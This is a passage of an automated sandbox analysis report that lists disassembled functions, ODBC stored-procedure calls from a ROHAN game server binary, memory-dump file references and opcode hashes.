                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_ReturnMail](?, ?)}
                                                                                      • API String ID: 0-3074024919
                                                                                      • Opcode ID: 85e8cdef3cbe1848ca1ceb0abed734f3123d6e6cece6b46ee9a09d455b5e6d7e
                                                                                      • Instruction ID: 1cb25110698e05141786d946ae6081b4b10a568e01b48b27688ff1a20fd271d5
                                                                                      • Opcode Fuzzy Hash: 85e8cdef3cbe1848ca1ceb0abed734f3123d6e6cece6b46ee9a09d455b5e6d7e
                                                                                      • Instruction Fuzzy Hash: 49212FB4640254ABEB28CB45DC42FE97374EB45B14F10868DFB146E2C0D6B16940CF98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_Get_Reward_Result_Invens] (?, ?)},000000FD), ref: 0043E8E2
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043E921
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043E956
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043E98E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_Get_Reward_Result_Invens] (?, ?)}, xrefs: 0043E8D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_Get_Reward_Result_Invens] (?, ?)}
                                                                                      • API String ID: 0-4007216872
                                                                                      • Opcode ID: 21c9aeab5c6c9c881bcc30e8281f7f3ed7e8cb04dd2074382aaae00fb40b33b0
                                                                                      • Instruction ID: 7ed8331f05bde93602bbfad6219a7b4c22fe7134700b6a40ab56ff643501f92a
                                                                                      • Opcode Fuzzy Hash: 21c9aeab5c6c9c881bcc30e8281f7f3ed7e8cb04dd2074382aaae00fb40b33b0
                                                                                      • Instruction Fuzzy Hash: FB2100B1A44658FBEB288F45CC56FE97336EBC4714F208289F7146E3C4D5B56D808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SavePortalIndex] (?,?)},000000FD), ref: 0043390E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043394D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433982
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004339BA
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SavePortalIndex] (?,?)}, xrefs: 00433905
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SavePortalIndex] (?,?)}
                                                                                      • API String ID: 0-367171547
                                                                                      • Opcode ID: 31de5df0f28c3bae8ec5284a097ebaac5861c216eb1d2401d73d1b67d4227d02
                                                                                      • Instruction ID: 5854e8a30e53bb6a272211ff92613d1561a0f47f8e690ad5a0b532180c2d34e8
                                                                                      • Opcode Fuzzy Hash: 31de5df0f28c3bae8ec5284a097ebaac5861c216eb1d2401d73d1b67d4227d02
                                                                                      • Instruction Fuzzy Hash: 51211FB4B4435CBBEB248F44CC52FAA7334FB85B18F208289F7196E6C4D6B56D408B59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_RemoveRecipe](?, ?)},000000FD), ref: 004368BF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004368FE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00436933
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043696B
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_RemoveRecipe](?, ?)}, xrefs: 004368B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_RemoveRecipe](?, ?)}
                                                                                      • API String ID: 0-2415696089
                                                                                      • Opcode ID: a675f327fb15e43ce361799a07af227229061bc974e0825b0348c64bba657d43
                                                                                      • Instruction ID: 6c6ed72407cf22de1df3d7816793e99a38aafc6d722aeccc60e9aef58790790d
                                                                                      • Opcode Fuzzy Hash: a675f327fb15e43ce361799a07af227229061bc974e0825b0348c64bba657d43
                                                                                      • Instruction Fuzzy Hash: 1021B3B16442146BFB289F54CD62FA97374FB44B18F204389F71C6E2C5D9B569408B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_JoinAllianceGuild](?, ?)},000000FD), ref: 0042D973
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D9B2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D9E7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042DA1F
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_JoinAllianceGuild](?, ?)}, xrefs: 0042D96A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_JoinAllianceGuild](?, ?)}
                                                                                      • API String ID: 0-1606073856
                                                                                      • Opcode ID: 51cfdd3f0dc69c9fdec7321267196b47b021fb773a83e4b539470d8f1c8a24f8
                                                                                      • Instruction ID: 130ba6aeecf92c14eddf1aa52c7bff20360f24ea71b835bbb5cfb2340f41084c
                                                                                      • Opcode Fuzzy Hash: 51cfdd3f0dc69c9fdec7321267196b47b021fb773a83e4b539470d8f1c8a24f8
                                                                                      • Instruction Fuzzy Hash: 1E21D3B16806146BEB249F54CC52FEB7374EB4471DF208289F71C6E2C4D6B569808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetIndunRankerMessage] (?,?)},000000FD), ref: 0043BA27
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043BA66
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043BA9B
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000028,00000000,?,00000029,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043BAD3
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetIndunRankerMessage] (?,?)}, xrefs: 0043BA1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetIndunRankerMessage] (?,?)}
                                                                                      • API String ID: 0-3078763994
                                                                                      • Opcode ID: 0420d5d8af436dba1c9a75b59cf741e2870ea88c661297d98c7b25aa11722164
                                                                                      • Instruction ID: d3e51ffd4c2f544c1cae997b37b7bc5b298469e620828a8145fe5c3021e3ee28
                                                                                      • Opcode Fuzzy Hash: 0420d5d8af436dba1c9a75b59cf741e2870ea88c661297d98c7b25aa11722164
                                                                                      • Instruction Fuzzy Hash: E3213EB1A84219BBEB308F44CC42FBA7374EB88B14F108199F7186E6C5C6B169419F88
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetNGuildWarKillInfoList] (?,?)},000000FD), ref: 00434A29
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00434A68
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00434A9D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00434AD5
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetNGuildWarKillInfoList] (?,?)}, xrefs: 00434A20
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetNGuildWarKillInfoList] (?,?)}
                                                                                      • API String ID: 0-1596954230
                                                                                      • Opcode ID: e4fa49e9a4f3b53c1a60febf778dd90a6f73077aa6c1ff828c46fbd832a2d65d
                                                                                      • Instruction ID: 7c06663eb98635966c32cbd1bc7ef59231e8deb16c04e0d5f0cbed06825f95ed
                                                                                      • Opcode Fuzzy Hash: e4fa49e9a4f3b53c1a60febf778dd90a6f73077aa6c1ff828c46fbd832a2d65d
                                                                                      • Instruction Fuzzy Hash: 94213EB0B41318ABFB209F44CC52FAA7334FB45B14F254289F619AE6C0D6B56D408B59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_LeaveAllianceGuild](?, ?)},000000FD), ref: 0042DA49
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042DA88
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042DABD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042DAF5
                                                                                      Strings
